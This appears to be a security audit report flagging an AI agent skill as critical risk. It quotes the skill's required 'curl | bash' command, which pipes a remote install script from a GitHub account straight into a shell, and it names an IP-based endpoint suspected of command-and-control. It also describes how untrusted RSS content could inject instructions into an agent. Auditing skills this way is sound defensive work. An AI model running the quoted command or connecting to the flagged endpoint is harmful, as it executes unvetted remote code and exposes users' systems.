mcp-us-equities-read
Fail
Audited by Snyk on Mar 10, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 0.95). These URLs are suspicious: they ask you to curl | bash a raw .sh from an untrusted GitHub account and point the installed CLI at an IP-based, non-HTTPS VPS endpoint (http://113.44.56.214:18080), which matches high-risk indicators for executable distribution and possible malware/command-and-control.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.80). The skill's SKILL.md requires calling a VPS MCP endpoint (http://113.44.56.214:18080/mcp/) and includes a read_reports tool with sources like "expert_rss", which indicates the agent will ingest public/untrusted RSS/research content from third-party sources that can influence its decisions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill's prerequisites require running a remote install script via curl -fsSL https://raw.githubusercontent.com/zz3310969/max-skills/main/scripts/install-rw.sh | bash, which downloads and immediately executes remote code as a required dependency for the skill.
Audit Metadata